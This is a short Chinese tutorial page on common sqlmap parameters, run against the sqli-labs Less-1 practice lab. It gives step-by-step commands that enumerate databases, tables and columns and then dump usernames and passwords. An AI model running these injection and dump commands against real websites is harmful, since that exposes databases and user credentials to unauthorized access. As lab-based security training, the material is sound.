sqlmap 常用注入参数(一)

 时间:2024-11-07 02:40:34

1、所有参数以sqli-labs第一关为例, python2 sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" -u针对目标网站id参数注入测试,也可后面添加&uid=2",所有参数进行测试,检测出含有id注入漏洞。

sqlmap 常用注入参数(一)

2、获取当前数据库参数--current-db,python2 sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" --current-db。检测出当前数据库名称为security。

sqlmap 常用注入参数(一)sqlmap 常用注入参数(一)

3、--current-user检测当前用户参数,python2 sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" --current-user,检测出当前用户为root。

sqlmap 常用注入参数(一)sqlmap 常用注入参数(一)

4、--dbs检测出数据库中所有库的名称,python2 sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" --dbs。

sqlmap 常用注入参数(一)sqlmap 常用注入参数(一)

5、-D 数据库 --tables获取参数中数据所有表的名称,python2 sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" -D security --tables。

sqlmap 常用注入参数(一)sqlmap 常用注入参数(一)

6、-D 数据库 -T 表 --columns获取参数中数据中表的所有列,python2 sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" -D security -T users --columns,以users表为例如下。

sqlmap 常用注入参数(一)sqlmap 常用注入参数(一)

7、-D security -T users -C username,password -dump获取security数控中users表中username跟password的数据信息,python2 sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" -D security -T users -C username,password --dump。

sqlmap 常用注入参数(一)sqlmap 常用注入参数(一)
  • 【Java】如何通过POI设置Excel的边框
  • 如何处理 ORA-28002 password will expire 错误
  • Win10桌面设置审核登录成功事件?
  • Notepad++设置左侧文件夹树结构?LightExplorer
  • 热门搜索
    早安的句子 朋友圈 qq设置在哪里 怎么发表小说 小孩出水痘怎么办 安信地板怎么样 如何修眉 如何买基金新手入门 工作联系单怎么写 alicia怎么读 如何写剧本